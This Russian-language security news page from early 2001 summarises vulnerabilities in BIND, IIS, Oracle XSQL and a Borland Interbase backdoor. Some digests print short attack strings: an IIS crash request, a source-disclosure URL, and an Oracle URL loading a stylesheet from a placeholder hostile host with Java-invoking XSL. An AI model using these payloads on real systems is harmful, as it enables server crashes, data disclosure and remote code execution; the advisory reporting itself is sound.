Главная
Архив новостей
Безопасность в Unix
Безопасность в Windows
Сборник FAQ'ов
Телефония, фрикинг
Кредитные карты
Криптография
Истории о хакерах
Программы, утилиты
_el@sp.sz.ru


Проект
"Russian security ring" О проекте
            "Russian security ring" Переход на один из сайтов кольца "Russian
security" Переход на предыдущий сайт кольца "Russian
security" Переход на следующий сайт кольца "Russian
security"


BEPCTAK


онлайн переводчик

Security Page


Статьи
Поиметь, или... поиметь два раза? 07/12/99
Проблемы CGI на Perl 10/11/99
Шпионские штучки 06/10/99
Безопасность компьютерных систем на базе Windows NT 01/09/99
Сруби бабки в сети! 15/08/99
Вирусы 05/08/99
Переполнение буфера win32: беспредел 31/07/99
Как смотреть НТВ+ 15/07/99
И снова кардинг. Российский опыт 5/07/99
Еще раз о настоящих программистах 29/06/99

RSL
Обновлен комплексный Post SP6 Hotfix для WinNT 4.0 (v6.23)
/Игорь Митюрин 8.02.2001 10:41:16/:

Обновлен комплексный пост SP6 хотфикс для Windows NT4.0 Server и Workstation. 23 хотфикса устанавливаются за один раз. Все пересечения учтены.
Файл можно забрать с моей домашней страницы.


Серьёзная уязвимость в BIND.
/HackZone.Ru/RSN Forum 31.01.2001 02:45:05/:

CERT опубликованны два переполнения буфера и "ошибка форматной строки" в BIND 4 и 8, позволяющие захватить контроль над DNS -сервером. Практически это может привести к неработоспособности значительной части Интернета.
FreeBSD и практически все производители коммерческих версий Linux уже объявили о патчах для BIND, но многие ли ими воспользуются?


Обновлен комплексный Post SP6 Hotfix для WinNT 4.0
/Игорь Митюрин 29.01.2001 17:52:58/:

Обновлен комплексный пост SP6 хотфикс для Windows NT4.0 Server и Workstation. 22 хотфикса устанавливаются за один раз. Все пересечения учтены.
Файл можно забрать с моей домашней страницы.


Серьёзные уязвимости популярных сервисов
/HackZone.Ru/RSN Forum 27.01.2001 00:04:12/:

Новости RSN форума
Новая ошибка в популярных WWW-почты использующих таблицы стилей (Hotmail, ZDNet).
Специально сформированное письмо может с переопределить служебные кнобки в Web-итерфейсе. (2 сообщения: 24/1- Ben Li , 26/1- Gregory Duchemin)
Переполнение буфера в Netscape Communicator 6. (1- Anders Ingebornlt)
AOL Instnat Messenger позволяет выполнить скрипты под видом картинок (1 - Dont Know Guilt )

Ведщий форума A. V. Komlin


Рождественский набор ошибок от Микрософт.
/HackZone.Ru/RSN Forum 17.01.2001 04:09:35/:

1.IIS рушится, получив запрос вида GET /%0%0 HTTP/1.0 - NtWaK0
2.Переполнение стека в программах использующих MSHTML.DLL (IE, Outlook) - Thor Larholm
3. Уязвимость в IE+WMP позволяет загрузить в роли WMP skin апплет (.jar), и получить доступ к диску по чтению. - Guninski
4. Web Client позволяет перехватить NTLM-хэш пользователя- Ben Greenbaum
С уважением, ведущий RSN форума - A.V. Komlin


Открыт умышленно встроенный чёрный ход в продуктах Borland/Inprise (Interbase, Firebird )
/HackZone.Ru/RSN Forum 12.01.2001 16:03:33/:

CERT опубликовало сообщение о чёрном ходе предназначенном для удалённого получения несанкционированных административных привилегий в продуктах Borland/Inprise (Interbase, Firebird ).
Баг был открыт благодаря публикации исходных текстов продуктов.
Borland выпустило патч.


Oracle 8.1.7 позволяет несанкционированно исполнять удалённые сервлеты.
/HackZone.Ru/RSN Forum 10.01.2001 13:18:51/:

Oracle XSQL servlet позволяет несанкционированно исполнять удалённые сервлеты. Это происходит 1) из-за возможности указывать внешние таблицы стилей

http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl

2) возможности вставлять в последние объекты java.

<xsl:xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0">
...
<xsl:variable name="str1" select="jstr:new('java on the server')" />
...


MindResourses 2001
/dl 10.01.2001 03:08:42/:

3-4 февраля в Москве пройдет demoparty MindResourses 2001. Оно обещает быть одним из крупнейших событий на российской демосцене за последние два года.
О своем участии уже заявили такие известные группы как Proxium, T-Rex, Hrg, Accept Core, Energy, WRC, Hbg.
Ожидаются и новые лица, приглашаются все желающие, гарантируются реальные призы и подарки.


Очередная ошибка IIS 5
/HackZone.Ru/RSN Forum 9.01.2001 03:54:06/:

Очередная ошибка IIS 5 позволяет просматривать CGI файлы добавляя ("%3F+.htr")

http://TARGETIIS/scripts/test.pl%3F+.htr


Новости
Арестован один из хакеров, укравших номера кредиток Гейтса и Арафата 23/02/01

Хакеров впервые официально приравняли к террористам 20/02/01

Питерские подростки терроризовали школу через Интернет 19/02/01

Хакер получит работу благодаря "Анне Курниковой" 17/02/01

Jxta: секретное оружие Sun против Microsoft 16/02/01

Ответственность за гвирус Курниковойё взял на себя нидерландец 14/02/01

Создатель "Анны Курниковой" хотел как лучше 14/02/01

Под видом Курниковой 13/02/01

Эксперт Hackzone: все бесплатные российские почтовые серверы легко можно взломать 13/02/01

Вирус Курниковой покоряет интернет 13/02/01

Вирус "Анна Курникова" разбушевался в Австралии 13/02/01

Хакеры взломали сайт Центра управления полетами 12/02/01

В Сети появилась обновляемая карта распространения компьютерных вирусов 08/02/01

гЖучокё позволяет читать чужие электронные письма 06/02/01

Проблема: Интернет в школах 05/02/01

Всемирный экономический форум пострадал от хакеров 05/02/01

Хакеры украли номера кредиток Билла Гейтса, Ясира Арафата, Шимона Переса и Кофи Аннана 05/02/01

Пять украинских программистов научились произвольно менять номера ICQ 03/02/01

NSA конструирует компьютер со встроенным сейфом 02/02/01

ПО защищает пользователей мобильных телефонов от мошенников 02/02/01

"Лаборатория Касперского" на 5 лет защитит ЦБ от вирусов 01/02/01

В столице Белоруссии задержали 26 хакеров 01/02/01

Хакеры взломали сайт Шарона и украли базу данных 31/01/01

Cпутниковое телевидение устроило тысячам взломщиков "черное воскресенье" 31/01/01

CERT предупреждает об уязвимости интернет-ПО 31/01/01

Microsoft расследует предательские публикации кода IE 6 30/01/01

Побочный эффект ускорения 30/01/01

"Дыра" в программе BIND может привести к неработоспособности всего Интернета 30/01/01

Хакерам не понравилось выступление Папы Римского, и они взломали его сайт 26/01/01

Веб-бандиты заблокировали доступ к сайтам Microsoft 26/01/01